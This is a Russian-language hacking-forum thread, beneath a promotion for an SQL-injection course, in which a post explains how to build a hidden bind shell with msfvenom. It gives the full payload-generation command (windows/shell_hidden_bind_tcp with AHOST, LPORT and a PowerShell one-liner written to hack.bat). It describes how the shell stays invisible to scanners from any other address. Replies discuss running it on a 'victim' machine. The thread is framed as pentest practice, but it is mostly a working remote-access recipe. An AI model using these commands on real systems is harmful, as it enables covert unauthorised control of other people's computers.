• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 099
BIT
0
Hidden_Bind_Shell.png

Привет колеги. Это будет коротенький пост из серии MustKnow(Нужно Знать). Как бы ничего нового но я посчитал нужным кинуть в копилку форума описания этого метода.
Ничего нового мы изобретать с вами не будем,а воспользуемся обычной генерацией полезной нагрузки средствами msfvenom,и я лишь немного прокомментирую этот способ получения BIND SHELL-а.

И так, давайте для начала посмотрим все опции которые возможны при создании нашего скрытого бинд шелла,а так же глянем описания(Рекомендую всегда читать описания!):
Код:
msfvenom -p windows/shell_hidden_bind_tcp --payload-options
1.PNG


Как видим из списка опций - есть обязательный параметр AHOST ([Allowed IP Adress|Разрешенный айпишник]) И в описании читаем о том ,что мы поднимаем листенер на порту ,которой указывается опционально "параметр LPORT", и если мы будем стучатся на этот порт с айпишника который мы указали в параметре AHOST - то нам будет прилетать шелл,но если это будет любой другой айпи адресс - то удаленная машина будет отвечать RST пакетом и порт для соединения будет закрыт.Таким образом обнаружить открытый порт никто кроме нас не сможет(ну если конечно с нашего айпишника никто не будет сканит)


Давайте все же протестируем. Создадим полезную нагрузку:
Код:
msfvenom -p windows/shell_hidden_bind_tcp AHOST=192.168.137.137 lport=4444 -f psh-cmd -o hack.bat
AHOST -- разрешенный айпи (в моем случае 192.168.137.137)
lport -- порт для листенера
-f psh-cmd -- формат полезной нагрузки ( в моем случает однострочная команда для powershell)

2.PNG

Я специально для наглядности указал не свой айпи что бы показать как это работает.
Дальше запустим на стороне жертвы и попробуем просканировать на 4444 порт.
3.PNG
4.PNG
5.PNG


Как видите порт закрыт. Давайте сменим свой айпи на 192.168.137.137 и попробуем снова.
6.PNG


Проверим шелл:

7.PNG


Все работает с указанного айпи)
Надеюсь кому то будет полезным)
Всем спасибо)
 
B

Bafomet

это скрытие от пользователя, системы или антивиря?
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 099
BIT
0
это скрытие от пользователя, системы или антивиря?
Это способ получение консоли удаленной машины с возможностью подключения только определенного айпи адреса,тоесть подключится к жертве можно будет только с того айпи,который мы указали в параметре AHOST. Это своего рода скрытие открытого порта у жертвы для всех остальных участников сети.
 

ghostphisher

местный
Grey Team
07.12.2016
2 602
3 413
BIT
0
Я наверное самый пентестер неудачный =))))


PORT STATE SERVICE
4567/tcp closed tram

Делаю все по списку ;) Четко, видтать win xp не пробиваемая система =)))
 

jonni_vu

Green Team
24.06.2017
43
8
BIT
0
У меня при запуске shella на вирт. wind7 постоянно порт open. shell получал с разных ahost. Почему?настроен сетевой мост.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!